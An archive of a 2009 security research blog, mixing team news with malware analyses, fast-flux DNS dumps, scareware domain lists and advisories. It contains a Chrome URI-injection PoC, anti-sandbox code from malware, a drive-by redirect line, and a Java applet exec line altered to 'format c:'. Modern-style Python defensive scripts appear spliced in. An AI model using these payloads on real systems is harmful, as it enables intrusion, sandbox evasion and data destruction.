Saturday, January 31, 2009

Thanks to everyone

Time to remember the past:

We started off as a very tiny site (we are still small), though we have expanded a little. Thanks to every single volunteer who has made this happen. Thanks to our partners, viewers/users, media supporters, and everyone who has contributed to our team in one way or another.

Time to think about the future:

We are coming up with our new malware analytics portal, which will be led by Bonfa[PM], and a rootkit analytics portal led by Kirk. Bonfa and his two friends have been working really hard on the malware analytics portal, and about 95% of the preliminary beta version for the release is done. We are expecting to see this site by mid-to-late February 2009. Kirk[PM] and Naga[TM] have been working hard on the rootkit analysis portal, though it is expected to start up only by the end of May 2009.

Kevin[TM] has been working really hard on a multi-core bruteforcer and will be up with one really soon. His research and analysis will be published soon. Jorge Alejandro Mieres[TM] has proven skills in consistent research and blogging. He will be working on our NectarGrid project really soon, though he is still doing his research.

Congratulations to Aditya K Sood[PM], our new Project Manager for the Vulnerability Analytics team, a portal for supporting CERTs around the world that will be coming really soon. Thanks to Kalyana Kumar[TM] for his constant dedication to PCAP capture; he is becoming a team lead by the end of February 2009.

Thanks to everyone else who is not listed in the current projects for your consistent help and passion for information security. Keep it coming, guys!!!

- EF

[PM] - Project Manager
[TL] - Team Lead
[TM] - Team Member

Google is Malicious

Google tells everyone that they themselves are malicious and that their site would harm your computer if you visit it. We are not the ones saying this; Google is... check the following:



One of our researchers, Rohit Bansal, sent us a link that says the same:

When someone clicks on this link, http://www.google.com/interstitial?url=http://google.com/

we got the following page this morning:



Google is trying to communicate with the people of this world. They are telling you that they are over-priced and not to buy their stock, since they are malicious to the current economic conditions.

Joe from JoeSecurity/www.Joebox.org was discussing the end results with EvilFingers this morning. The funny thing is, Google's stock is strangely dropping today. We do not know whether this is the cause, but we wouldn't blame people for not clicking on Google when Google itself cautions you that it is malicious.

End Result Graph (correlated for fun):



However, it is still not proven that the dip in the stock was due to this terrible error; it would make sense even if it were.

This is an example of how research and development can be hazardous to a giant organization when it enters production without testing... It is funny how this repetitive pattern has been seen for every large kingdom or organization: they climb high and become famous so quickly, and then they head for self-destruction or disaster.

- EF

Electronic security and spread of malware

A growing number of cases of infections, or potential infections, through electronic devices are known. The latest known case, which I commented on in malware preinstalled (in Spanish), has sparked an interesting discussion that reminds me of a nice story on this topic.

After a talk on antivirus security in which I explained what social engineering is and how worms spread through a text file named Autorun.inf (not malware itself; it simply uses the automatic execution functionality of Windows), one of the attendees asked me for one of the programs used during the talk. I copied it onto a USB stick and handed it over, but this attentive person said no: "I don't want to connect that memory stick, because my computer may get infected." Although the stick was clean, that was the correct attitude.

Well, I said, "I'll copy it onto another medium," and copied the same file onto an iPod. The person was fine with that and connected the iPod to their computer, without taking into account that they were doing nothing other than accessing a storage device that is just as likely to host malicious code.

Removable storage devices that connect via USB have a high rate of effectiveness in the dissemination of malicious code, and I am not just talking about USB sticks: I am talking about iPods, mp3 and mp4 players, cameras, camcorders, cell phones, digital photo frames, and any device that interacts with the PC.

From the economic point of view, in many countries any of these devices can be bought at low cost; however, this represents an extra risk, because of the little control exercised over the manufacturing process of these devices and over quality control when they go on sale. They can be potential channels of infection, even through the CD that accompanies the device.

Somewhere I read the recommendation to purchase products from renowned companies; however, that isn't a guarantee either, as cases such as Samsung's demonstrate. As you can see, absolutely nothing is certain, but it is wise to implement mechanisms that allow us to mitigate such problems, e.g. maintaining an active and updated antivirus program.
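Because the Autorun.inf trick described above works entirely through a small text file, a defender can inspect that file before trusting a device. The Python script below is an added example, not code from this post: it parses an autorun.inf the way Windows reads it (INI sections) and reports every directive that would launch code. Both sample files, including the RECYCLER directory with its made-up SID-style name, are constructed for the illustration.

```python
import configparser
import re

# Constructed sample: an autorun.inf of the kind a USB worm drops. It points
# every launch directive (open=, shellexecute=, shell\<verb>\command=) at the
# same hidden payload. The directory name is a made-up placeholder.
SUSPICIOUS_AUTORUN = """[autorun]
open=RECYCLER\\S-1-5-21-0000000000-0000000000-0000000000-1013\\update.exe
icon=%SystemRoot%\\system32\\SHELL32.dll,4
shellexecute=RECYCLER\\S-1-5-21-0000000000-0000000000-0000000000-1013\\update.exe
shell\\open\\command=RECYCLER\\S-1-5-21-0000000000-0000000000-0000000000-1013\\update.exe
shell\\explore\\command=RECYCLER\\S-1-5-21-0000000000-0000000000-0000000000-1013\\update.exe
label=My Disk
"""

# Constructed sample: what a vendor CD or photo-frame disk legitimately needs.
BENIGN_AUTORUN = """[autorun]
label=Photo Frame Software
icon=setup\\frame.ico
"""

# Directives that cause code to run when the device is inserted or opened.
LAUNCH_KEYS = ("open", "shellexecute")
# File types Windows would execute directly.
EXECUTABLE_RE = re.compile(r"\.(exe|com|scr|bat|cmd|pif|vbs|js|hta)\b", re.IGNORECASE)
# Directories worms favour because Explorer hides them by default.
HIDDEN_DIRS = ("recycler", "$recycle.bin", "system volume information")


def launches_code(key):
    """True for open=, shellexecute= and shell\\<verb>\\command= directives."""
    key = key.lower()
    return key in LAUNCH_KEYS or (key.startswith("shell\\") and key.endswith("\\command"))


def analyze_autorun(text):
    """Parse an autorun.inf and report every directive that would run code.

    Returns {"verdict": "suspicious"|"benign", "findings": [...]}; each finding
    records the directive, its target, whether the target is an executable and
    whether it lives in a directory Explorer hides.
    """
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    parser.read_string(text)
    findings = []
    if parser.has_section("autorun"):
        for key, value in parser.items("autorun"):
            if not launches_code(key):
                continue
            findings.append({
                "directive": key,
                "target": value,
                "executable": bool(EXECUTABLE_RE.search(value)),
                "hidden_dir": any(d in value.lower() for d in HIDDEN_DIRS),
            })
    verdict = "suspicious" if any(f["executable"] for f in findings) else "benign"
    return {"verdict": verdict, "findings": findings}


if __name__ == "__main__":
    for name, sample in (("worm-style", SUSPICIOUS_AUTORUN), ("vendor", BENIGN_AUTORUN)):
        report = analyze_autorun(sample)
        print(name, report["verdict"])
        for finding in report["findings"]:
            print("  ", finding["directive"], "->", finding["target"])
```

open= and shellexecute= fire on insertion on the Windows versions that honour them for removable media; the shell\<verb>\command= entries hijack the Explorer context-menu verbs, which is why a worm sets all of them at once. A benign vendor disk only needs label= and icon=, so any launch directive pointing at an executable deserves a second look, and one pointing into a hidden directory almost certainly does.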

Some of the infections through various devices during 2008 that can be highlighted are:

Samsung SPF-85H 8-Inch Digital Photo Frame
Mercury 1.5" Digital Photo Frame
Hewlett-Packard USB Drives 256K / 1GB
Insignia 10.4" NS-DPF10A Digital Photo Frame

Not to panic, but to be careful :-)

# Jorge Mieres

Friday, January 30, 2009

Yet Another Google Chrome Sploit

Milw0rm released a Google Chrome 1.0.154.46 (ChromeHTML://) Parameter Injection PoC [by waraxe].

****The following is copied and pasted from http://www.milw0rm.com/exploits/7935****

Try this:

chromehtml:"%20--renderer-path="calc"%20--no-sandbox

Disabling sandbox does matter :)
Tested with Google Chrome 1.0.154.46 on Win XP/Vista and IE6/IE7 and it works ...

Full PoC:

< html > < head >< title >Chrome URI Handler Remote Command Execution PoC< / title >< / head >
< body >
< h3 >This is a test< / h3 >
< iframe src='chromehtml:"%20--renderer-path="calc"%20--no-sandbox' width=0 height=0 >< / iframe >
< / body>< / html>

# milw0rm.com [2009-01-30]

Sandbox Awareness

Hi there,

Recently, malware has evolved new ways of evading detection, such as sandbox awareness: if the malware is executed inside one of the most famous sandboxes, it blocks its own execution.

Here is a little piece of code taken from a malware sample and readapted:


' The Win32 API declarations (CreateToolhelp32Snapshot, Module32First/Next,
' CloseHandle, GetCurrentProcessId, RegOpenKeyEx, RegQueryValueEx, RegCloseKey)
' and the MODULEENTRY32 type are assumed to be declared elsewhere in the module.
Public Function IsInSandbox() As Boolean
    Dim hKey As Long, hOpen As Long, hQuery As Long, hSnapShot As Long
    Dim me32 As MODULEENTRY32
    Dim szBuffer As String * 128

    ' Walk the modules loaded into the current process
    hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, GetCurrentProcessId)

    me32.dwSize = Len(me32)
    Module32First hSnapShot, me32

    Do While Module32Next(hSnapShot, me32) <> 0
        If InStr(1, LCase(me32.szModule), "sbiedll.dll") > 0 Then      ' Sandboxie
            IsInSandbox = True
        ElseIf InStr(1, LCase(me32.szModule), "dbghelp.dll") > 0 Then  ' ThreatExpert
            IsInSandbox = True
        End If
    Loop

    CloseHandle (hSnapShot)

    ' No known DLL found: compare the Windows ProductId with the values
    ' of the sandbox images
    If IsInSandbox = False Then
        hOpen = RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion", 0, KEY_ALL_ACCESS, hKey)
        If hOpen = 0 Then
            hQuery = RegQueryValueEx(hKey, "ProductId", 0, REG_SZ, szBuffer, 128)
            If hQuery = 0 Then
                If InStr(1, szBuffer, "76487-337-8429955-22614") > 0 Then      ' Anubis
                    IsInSandbox = True
                ElseIf InStr(1, szBuffer, "76487-644-3177037-23510") > 0 Then  ' CWSandbox
                    IsInSandbox = True
                ElseIf InStr(1, szBuffer, "55274-640-2673064-23950") > 0 Then  ' JoeBox
                    IsInSandbox = True
                End If
            End If
        End If
        RegCloseKey (hKey)
    End If
End Function


It detects Sandboxie, ThreatExpert, JoeBox, CWSandbox and Anubis by checking the Windows ProductId or the presence of the usual DLLs, such as sbiedll.dll and dbghelp.dll.
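From the defender's side, the same strings give a cheap static triage signal: a sample that embeds these sandbox product IDs or DLL names is announcing that it will behave differently under analysis. The following Python scanner is an added example, not code from the original post. It looks for the fingerprints above in both ASCII and UTF-16LE, because VB6 stores string literals as UTF-16LE and an ASCII-only search would miss them; the sample bytes are constructed here rather than taken from a real binary.

```python
# Fingerprints from the routine above: strings a sandbox-aware sample must
# carry in order to perform the comparison. dbghelp.dll is a normal Windows
# debug helper, so on its own it is only a weak indicator.
FINGERPRINTS = {
    b"sbiedll.dll": ("Sandboxie (injected DLL)", "strong"),
    b"dbghelp.dll": ("ThreatExpert (loaded DLL)", "weak"),
    b"76487-337-8429955-22614": ("Anubis (Windows ProductId)", "strong"),
    b"76487-644-3177037-23510": ("CWSandbox (Windows ProductId)", "strong"),
    b"55274-640-2673064-23950": ("JoeBox (Windows ProductId)", "strong"),
}


def encodings(needle):
    """Yield (encoding name, byte pattern) for the ASCII and UTF-16LE forms."""
    yield "ascii", needle
    yield "utf-16le", needle.decode("ascii").encode("utf-16-le")


def scan_for_sandbox_checks(data):
    """Return one hit per (fingerprint, encoding) present in the blob.

    bytes.lower() only touches ASCII letters and leaves the 0x00 high bytes of
    UTF-16LE alone, so a single lowercased haystack serves both encodings.
    """
    haystack = data.lower()
    hits = []
    for needle, (label, strength) in FINGERPRINTS.items():
        for enc_name, pattern in encodings(needle):
            offset = haystack.find(pattern)
            if offset != -1:
                hits.append({"label": label, "strength": strength,
                             "encoding": enc_name, "offset": offset})
    return hits


def triage(data):
    """Strong hits mean sandbox awareness; dbghelp.dll alone is only a hint."""
    hits = scan_for_sandbox_checks(data)
    if any(h["strength"] == "strong" for h in hits):
        verdict = "sandbox-aware"
    elif hits:
        verdict = "weak indicator only"
    else:
        verdict = "no sandbox checks found"
    return {"verdict": verdict, "hits": hits}


def build_constructed_sample():
    """Constructed stand-in for a VB6 binary: filler plus UTF-16LE literals."""
    filler = b"\x00" * 16
    return (b"MZ" + filler
            + "SbieDll.dll".encode("utf-16-le") + filler
            + "76487-644-3177037-23510".encode("utf-16-le") + filler
            + b"DBGHELP.DLL" + filler)


CONSTRUCTED_SAMPLE = build_constructed_sample()

if __name__ == "__main__":
    report = triage(CONSTRUCTED_SAMPLE)
    print(report["verdict"])
    for hit in report["hits"]:
        print(f'  {hit["label"]:<32} {hit["encoding"]:<8} @0x{hit["offset"]:x}')
```

A packed or encrypted sample hides these literals until it unpacks, so a clean result from this scan proves nothing; a positive result, on the other hand, tells the analyst up front to run the sample on a non-fingerprinted machine or to patch the ProductId and module list the sandbox exposes.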

Understanding Fast-Flux networks

Fast-Flux networks are an advanced methodology in the spread of threats, currently being exploited actively to infect computers (among other crimes). The goal is to hide the real servers behind IP addresses that rotate within seconds for the same domain, making them very hard to locate and therefore hard to identify and block.

Each of the IP addresses assigned to these domains belongs to a machine that was previously compromised by some malicious code as part of a botnet, and works as a "bridge" between the computer requesting a specific action and the server hosting the resource. This mode of operation of the network is called Single-Flux.

That is, in a normal process a client makes a request (GET) to the server, which then responds by sending the client the result. In single-flux networks, the original request made by the client doesn't go to the server but to the zombie machine, and it is the zombie that performs the query to the server.

There is another method called Double-Flux which, in addition to providing the features of single-flux, also rotates the name resolution and registration services for the domain names.

With a simple DNS query against a domain it is possible to establish whether it is part of a Fast-Flux network. The following example shows the different IP addresses that are set for the domain www.lijg.ru.

;; QUESTION SECTION:
;www.lijg.ru. IN A

;; ANSWER SECTION:
www.lijg.ru. 600 IN A 24.107.209.119
www.lijg.ru. 600 IN A 24.219.191.246
www.lijg.ru. 600 IN A 65.65.208.223
www.lijg.ru. 600 IN A 65.102.56.213
www.lijg.ru. 600 IN A 67.141.208.227
www.lijg.ru. 600 IN A 68.124.161.76
www.lijg.ru. 600 IN A 69.14.27.151
www.lijg.ru. 600 IN A 70.251.45.186
www.lijg.ru. 600 IN A 71.12.89.105
www.lijg.ru. 600 IN A 71.235.251.99
www.lijg.ru. 600 IN A 75.11.10.101
www.lijg.ru. 600 IN A 75.75.104.133
www.lijg.ru. 600 IN A 97.104.40.246
www.lijg.ru. 600 IN A 173.16.99.131

;; AUTHORITY SECTION:
lijg.ru. 345600 IN NS ns5.lijg.ru.
lijg.ru. 345600 IN NS ns1.lijg.ru.
lijg.ru. 345600 IN NS ns2.lijg.ru.
lijg.ru. 345600 IN NS ns3.lijg.ru.
lijg.ru. 345600 IN NS ns4.lijg.ru.

On the other hand, they say a picture is worth a thousand words, so... let's see what the following one says. It was obtained from SecViz and created by Jaime Blasco:

Representing Fast-Flux networks with graphic tools is an excellent alternative, since it allows us to understand, in a single view and from a structural point of view, how such a network is composed.

In this example, the chart shows a series of Fast-Flux domains (blue) and each of the zombie PCs that make them up (red). By triangulating each of the domains, we notice that some zombies belong to multiple networks within the FF network structure.

This gives the attacker a greater advantage, because they have a far wider range of machines that are used in a distributed way to spread much more malware, send much more spam, carry out phishing attacks, and perform many other malicious and fraudulent activities.

# Jorge Mieres

Thursday, January 29, 2009

uCon Speaker line-up

--------------------------------------------
The partial speaking line up of uCon Security Conference 2009 has been announced. The organizing committee would like to thank everyone who submitted their proposals. Within a few days we will be announcing the complete list of speakers.

The conference will take place three days after the most insane street carnival in the world in Recife, Brazil, on 28th February 2009 and will also feature trainings sessions on 26th and 27th.

If you are outside Brazil and plan to attend to uCon, please contact us if you need any assistance on your travel. Carnival and hacking in a row, rather unique. Don't miss the chance.

For more information please visit http://www.ucon-conference.org.


PS: All training sessions will be delivered in Portuguese.


[-- SPEAKING LINE-UP: FIRST ROUND --]

Speaker: Jayson Street, CISSP (Stratagem One)
Keynote: "Dispelling the myths and discussing the facts of global
cyber-warfare"
Language: English
Track: Information warfare


Speaker: Stephen Ridley (Matasano)
Speech: "Intro to Windows Kernel Security Development"
Language: English
Track: Kernel hacking / reverse engineering / vuln-dev


Speaker: Julio Auto (Independent researcher)
Speech: "Practical (Introduction to) Reverse Engineering"
Language: Portuguese
Track: Reverse engineering


Speaker: Rodrigo Rubira Branco aka BSDaemon (Checkpoint / COSEINC)
Speech: "Advanced Payload Strategies: What is new, what works and what
is hoax?"
Language: Portuguese
Track: Vuln-dev / shellcoding


Speaker: Joseph McCray (Rapid7 / LearnSecurityOnline.com)
Speech: "Advanced SQL Injection"
Language: English
Track: Web hacking


Speaker: Gustavo Monteiro (Independent researcher)
Speech: "Secure log centralization, analysis & security visualization"
Language: Portuguese
Track: Log & event correlation / security visualization


Speaker: David Batanero (Independent researcher)
Speech: "GSM for fun and profit"
Language: English
Track: Telecom security


Speaker: Felipe Andres Manzano (Nimbuzz.com)
Speech: "Exploiting PDF Readers"
Language: English
Track: Vuln-dev / software testing
-----------------------------------------------

New strategy of social engineering to spread IE Defender

IE Defender is one of the many fake security programs (scareware, also called rogues) that constantly bombard users with the intent of infecting their computers through websites that pretend to be legitimate.

However, there are new deception strategies for spreading it that don't share the usual methodology of downloading the scareware from its own website, but instead seek to trick users in other ways to achieve their goals. In this case, IE Defender is being disseminated through websites that promise downloads of music in mp3 format and movies.

In either case, the promised album or movie is not what gets downloaded; instead, it is one of the variants in the IE Defender family.

All the pages used to spread this threat share the same download IP address (216.240.151.112):

free-games-rapidshare .com
movie-rapidshare .com
moviesrapidshare .org
music-rapidshare .com
musicrapidshare .org
warez-catalog .com
movie-megaupload .com
cpmusicpub .com
soft-rapidshare .net
softrapidshare .com
softrapidshare .org
ftp-warez .org
extra-turbo .com
softupdate09 .com
free-full .com

A minor detail that identifies these malicious sites is that nearly all of them pretend to be pages hosted on file-storage sites like Megaupload or Rapidshare, or directly warez sites designed for downloading.

# Jorge Mieres

Wednesday, January 28, 2009

Google Chrome 1.0.154.43 ClickJacking Vulnerability.

---------------------------------------------------
Advisory: Google Chrome 1.0.154.43 ClickJacking Vulnerability.

Version Affected: Google Chrome: 1.0.154.43

Release Date:
Disclosed: 27 January 2009
Released: 28 January 2009

Description:
The Google Chrome browser is vulnerable to a clickjacking flaw. A clickjacked page tricks a user into performing undesired actions by clicking on a concealed link. Attackers can trick users into performing actions which the users never intended to do, and there is no way of tracing such actions later, as the user was genuinely authenticated on the other page.

Proof-of-Concept:
Click Here
Alternate Link: http://www.secniche.org/gcr_clkj/

Credit:
Aditya K Sood (Founder, www.Secniche.org / Team Lead, www.EvilFingers.com)

Disclaimer:
The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no representations or warranties, either express or implied, by or with respect to anything in this document, and the author shall not be liable for any implied warranties of merchantability or fitness for a particular purpose or for any indirect, special or consequential damages.

---------------------------------------------------

Danmec Bot, Fast-Flux networks and recruitment of Zombies PCs

Danmec, or Asprox, is the name of a trojan designed to recruit zombie machines while collecting information from each of the infected victims.

While the appearance of this trojan isn't new, it now makes use of more complex strategies than those typically used by other malicious code, including its own early variants, such as Fast-Flux, to avoid detection by blocking programs and infect as many computers as possible.

Today, Fast-Flux networks are massively exploited, and thousands of active domains of Russian origin, such as the following, are reactivating botnets created by Danmec:

google-analitycs.lijg .ru
fmkopswuzhj .biz
fnygfr .com
fvwugekf .info
fwkbt .info
gbrpn .org
gbxpxugx .org
ghtileh .biz
gnyluuxneo .com
fuougcdv .org
www. dbrgf .ru
www. bnmd .kz
www. nvepe .ru
www. mtno .ru
www. wmpd .ru
www. msngk6 .ru
www. vjhdo .com
www. aspx37 .me
google-analitycs.dbrgf .ru
www. advabnr .com
www. lijg .ru
www. dft6s .kz

Each of these domains hosts the following script written in JavaScript, called script.js (MD5: ccec2c026a38ce139c16ae97065ccd91), which performs a Drive-by-Download:

The call made through the iframe tag goes to a URL that is part of a Fast-Flux network:

;; QUESTION SECTION:
;google-analitycs.lijg.ru. IN A

;; ANSWER SECTION:
google-analitycs.lijg.ru. 600 IN A 68.119.39.129
google-analitycs.lijg.ru. 600 IN A 69.176.46.57
google-analitycs.lijg.ru. 600 IN A 71.12.89.233
google-analitycs.lijg.ru. 600 IN A 76.73.237.59
google-analitycs.lijg.ru. 600 IN A 97.104.40.246
google-analitycs.lijg.ru. 600 IN A 98.194.180.179
google-analitycs.lijg.ru. 600 IN A 146.57.249.100
google-analitycs.lijg.ru. 600 IN A 151.118.186.131
google-analitycs.lijg.ru. 600 IN A 165.166.236.74
google-analitycs.lijg.ru. 600 IN A 173.16.99.131
google-analitycs.lijg.ru. 600 IN A 173.17.180.79
google-analitycs.lijg.ru. 600 IN A 24.107.209.119
google-analitycs.lijg.ru. 600 IN A 24.170.188.201
google-analitycs.lijg.ru. 600 IN A 68.93.61.194

;; AUTHORITY SECTION:
lijg.ru. 339897 IN NS ns3.lijg.ru.
lijg.ru. 339897 IN NS ns2.lijg.ru.
lijg.ru. 339897 IN NS ns1.lijg.ru.
lijg.ru. 339897 IN NS ns5.lijg.ru.
lijg.ru. 339897 IN NS ns4.lijg.ru.

;; Query time: 263 msec
;; SERVER: 192.168.240.2#53(192.168.240.2)
;; WHEN: Sun Jan 25 20:31:57 2009
;; MSG SIZE rcvd: 356

Meanwhile, each of the web addresses listed above forms a new farm of Fast-Flux networks, with its own groups of mirror IP addresses.

Fast-Flux is an advanced technique used for malicious purposes, together with others, for the spread of various threats. This means being cautious at all times.

# Jorge Mieres

Tuesday, January 27, 2009

Hibernation Time

We know that it is winter time for sure because some of our projects and volunteers have been hibernating.

Hibernating Projects:

  • Data Breach
  • ICMP Stuff
  • IP Stuff
  • Block Lists

Hibernating Sections:

  • PatchTuesday
  • NectarGrid
  • Reviews
  • Jobs

Hibernating Volunteers:

  • Blake Hartstein
  • Jack O'Neill
  • Ion Visser
  • John Smith
  • Neo Anderson
  • Rishi Narang



This definitely confirms that it is winter time :) and definitely a good time for hibernation. We appreciate all our volunteers for their patience and determination and we encourage our readers/users to join us in creating a secure future.

- EF

PMDv1.8

Logging Functionality:
Process Memory Dumper [PMD] is now coming up with a new update adding logging functionality, so that forensic analysts can log processes for later use. This comes along with MD5 functionality, to produce evidence in court if required.

The later version of PMD is coming up with a SNAPSHOT functionality, where the entire memory would be dumped, similar to core dumping of memory, along with the entire memory-logging functionality.

An extension of PMD would then take us into a new toolchest called SpyOS. SpyOS is built to help a forensic analyst right from the identification stage to the court scene [including assessment, research and analysis]. This would be an entire system monitor combined with a process viewer.

- EF

Deception techniques that do not go out of fashion

Do we only learn the hard way?

One issue that motivates daily reflection is why some users are still falling into traps that are otherwise well known.

Social engineering techniques such as double file extensions, spaces between the file name and the extension and, since the Internet began to be used as an attack platform, techniques such as fake codecs, are a small sample of them.

Web sites that host pornographic material are among the most visited online, and also the most used by malware disseminators to propagate threats. Rather than asking ourselves how it can still be possible for users to keep infecting their computers through these deception strategies, the answer would seem to lie in something as simple as the "high demand" for this kind of material, one of the most sought after.

Malware creators are well aware of this: the person who visits a pornographic site wants to see pornography, regardless of the format of the resource (video and/or image). So if the site offers the user a download, such as a fake codec "needed" to view the video, it is likely that in most cases the user will download it.

So they will see something like the screen shown in the capture, which after a few seconds displays a pop-up similar to the following:

The user, thinking that this is a codec needed to display the video, installs it. In fact, it installs malware, to date only detected by some antivirus companies.

On the other hand, there is an application consisting of an HTML file that is used to propagate this type of attack massively by any means.

The application doesn't create or modify malicious code; it simply allows spreading it through the classic method mentioned. The only requirement is to host it on a server (or zombie PC) and specify, in the HTML code, the download address of the malware in the following portion of code:

window.setTimeout("location.href = 'http://servidor.com/archivo.exe'", 1000);

As an additional component, the kit also proposes redirecting to the display of a real video. This is part of the social engineering strategy and seeks to clear any suspicion from the user.

We are no longer speaking only of techniques such as Drive-by-Download, exploits, scripting, code obfuscation and many others, but about caution and common sense.

It is not enough to rely only on antivirus solutions against the security risks caused by malicious code: in this case, and according to the VT report, antivirus products currently offer only 35.09% protection, with only 14 of 39 detecting the threat; the other 64.91% will depend significantly on our ability and common sense to detect potential malicious activity.

# Jorge Mieres

Monday, January 26, 2009

Attacking Mac systems through false security tool

Who said that everything was for windows? ;-P

While the bulk of the various deception and infection techniques are very common on Windows platforms, security is the responsibility of every system, regardless of its infrastructure or platform, so there are also rogue-type threats (also called scareware) for Mac systems.

In this case, the recent false security tool called iMunizator (actually it is not so recent :-) it took its first steps during 2007 and early 2008, but has now returned to the "charge" again) can be downloaded from various web sites that resolve to a single IP address (67.205.75.10), hosted in Ukraine by a web hosting company called iWeb Technologies Inc.

www.imunizator .com
www.imunizator .net
imunizator .com
imunizator .net
mac-imunizator .net

This malware shares its "website" with other well-known rogues through the IP 70.38.19.203:

Antispyware Deluxe (antispywaredeluxe .com)
Antivirus 2009 (antivirus-2009-pro .net)
Antivirus 2010 (av2010 .net)
Vista Antivirus 2008 (vav-2008 .net)

iMunizator has been deploying its deception strategy for some time, switching domains to revive itself and even changing its name (formerly MacSweeper).

Another interesting point is that the transfer of money to "buy" the fake tool is done through an e-commerce company called Plimus, a completely legal company of Israeli origin with offices in the central U.S. (San Diego and Silicon Valley) and Ukraine. That is why users will see the secure HTTPS protocol in the address bar, along with the usual recommendations and other safety guidelines that seek to demonstrate that we are operating from a trusted site.

Current malware seeks to obtain sensitive information from users in order to commit fraud, and its highest rate of propagation is felt on Windows platforms, but this case shows that malware creators are turning their sights toward new targets. Therefore, we must apply good security practices regardless of the technology in question.

More information about scareware:
Una recorrida por los últimos scareware (in Spanish)
Una recorrida por los últimos scareware II (in Spanish)

# Jorge Mieres

Sunday, January 25, 2009

Massive exploitation of vulnerabilities through servers ghosts

The number of Chinese domains that are used daily to exploit vulnerabilities on the computers of people who access web pages designed with malicious purposes is really significant.

These servers host pages containing exploits for weaknesses in different Microsoft Windows operating systems and some other applications, and they are currently being used on a massive scale for the spread of malicious code.

According to ThreatExpert, China and Russia are the two countries with the highest rate of spread of threats.
The domains below are housed in server farms, and many of these ghost servers are active, so caution is advised if you want to access them. The aim of publishing these domains is purely investigative and informative, and they are considered useful for blocking malicious URLs.

*.705sese cn (59.34.197.15) contains exploits for MS06-014, MS08-067, StormPlayer and RealPlayer running from /a2/fxx.htm, and downloads the binary al.css exploiting the MS08-067 vulnerability.
*.S350-d.bc cn (58.253.68.65) binary download gr.exe (MD5: abd5bcb105dd982ae0b9c1f8c66bc07c).
*.yandex2 cn (193.138.172.5) binary download load.exe (MD5: 2ce6d3c0f526f96b32db8cef06921ffc) from /load.php?spl&id=21=5.
*.metago cn (193.138.172.5)
*.copy-past cn (195.242.161.24) contains exploit.
*.whitebiz cn (91.211.64.155) binary download load.exe (MD5: d7d03b7ea57ecaf008350a4215f8e2bc) from /service/load.php.
*.winesamile cn
*.bigsellstaff cn
*.cntotalizator cn
*.fiesta-tests com
*.fresh-best-movies cn
*.helinking cn
*.ns2.oxdnski cn
*.onlinestat cn
*.trafiks cn
*.783456788839 cn (195.190.13.106) trojan download from /load.php?spl=zango1.
*.234273849543 cn
*.384756783900 cn
*.109438129432 cn
*.sinakis cn (91.211.64.89) malware download from /baner/load.php?id=187&spl=4.
*.nohtingherez cn (217.20.112.96) binary download adv111.exe (MD5: 4adc9c50005c301db9af13f8467801f7).
*.o6ls cn (91.203.4.137) malware download from /load.php?id=3459&spl=4.
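The lists in this post and in the IE Defender post above are written for humans, with the TLD defanged by a space, and mix domains, IP addresses, hashes and download paths in free text. As an added example (not code from the original), the Python below pulls those indicators out into structured records and produces a deduplicated blocklist of refanged domains. The sample lines are copied from the two posts; the set of accepted TLDs is limited to those that appear on this page, which is an assumption of the example, and a bare space before the TLD is accepted only because that is how these posts defang.

```python
import re

# Lines copied from the lists in this post and the IE Defender post
# (domains are defanged in the originals with a space before the TLD).
SAMPLE_LINES = """\
*.705sese cn (59.34.197.15) contains exploits for MS06-014, MS08-067, StormPlayer and RealPlayer running from /a2/fxx.htm, and downloads the binary al.css exploiting the MS08-067 vulnerability.
*.S350-d.bc cn (58.253.68.65) binary download gr.exe (MD5: abd5bcb105dd982ae0b9c1f8c66bc07c).
*. metago cn (193.138.172.5)
*.sinakis cn (91.211.64.89) malware download from /baner/load.php?id=187&spl=4.
free-games-rapidshare .com
www. dbrgf .ru
google-analitycs.lijg .ru
"""

# Assumption: only the TLDs that occur on this page are recognised.
TLDS = r"(?:cn|com|net|org|info|biz|ru|kz|me)"
# A defanged domain: labels joined by "." with optional spaces around it,
# and the TLD separated by a dot, a space, or " ." as the posts write them.
DOMAIN_RE = re.compile(r"\b(?:[\w-]+\s*\.\s*)*[\w-]+(?:\s*\.\s*|\s+)" + TLDS + r"\b", re.I)
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
MD5_RE = re.compile(r"\b[0-9a-f]{32}\b", re.I)
PATH_RE = re.compile(r"/[\w./?&=%-]+")


def normalize_domain(text):
    """Refang: collapse ' .', '. ' and bare spaces into a single dot, lowercase."""
    return re.sub(r"\s*\.\s*|\s+", ".", text.strip()).lower()


def extract_iocs(text):
    """Return one record per non-empty line with the indicators found in it."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        # Drop the leading "*." wildcard marker used in the post.
        body = re.sub(r"^\*\.\s*", "", line.strip())
        rows.append({
            "domains": [normalize_domain(m) for m in DOMAIN_RE.findall(body)],
            "ips": IP_RE.findall(body),
            "md5s": [m.lower() for m in MD5_RE.findall(body)],
            # A path at the end of a sentence picks up the full stop; drop it.
            "paths": [p.rstrip(".") for p in PATH_RE.findall(body)],
        })
    return rows


def blocklist(text):
    """Sorted, deduplicated list of refanged domains, ready for a DNS/proxy block."""
    return sorted({d for row in extract_iocs(text) for d in row["domains"]})


if __name__ == "__main__":
    for row in extract_iocs(SAMPLE_LINES):
        print(row)
    print("blocklist:", blocklist(SAMPLE_LINES))
```

For feeds that defang differently (square brackets around dots, hxxp schemes) the normalisation step is the only part that changes; the rest of the pipeline, and the blocklist it produces, stays the same.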

# Jorge Mieres

Saturday, January 24, 2009

Applet Of Death FULL DISCLOSURE!

Proof of Concept: how an innocent-looking applet can harm / take control of your PC.

This is a demonstration of how a Java applet can harm your PC. We have not seen anybody exploiting Java applets yet, but a rogue website hosting a rogue signed applet is as dangerous as an ActiveX control, which means full control of the system of whoever visits that website and accepts the security warning. The security warning dialog shown by Sun for a signed applet is very weak; it doesn't say anything about harming your PC. The applet I am going to demonstrate will not do any harm, but will fire up calc.exe, which is under Windows' System32 folder (provided that the user runs the applet as Administrator).

This applet can be made to run any application under the browsing user's privileges by simply replacing this line:

p = Runtime.getRuntime().exec(System.getenv("windir")+"\\system32" +"\\calc.exe");

with any exe you want to run :)

e.g.

p = Runtime.getRuntime().exec(System.getenv("windir")+"\\system32" +"\\cmd.exe /c format c:");

will format the visitor's C drive!!!

The steps a visitor needs to take to become a victim are:
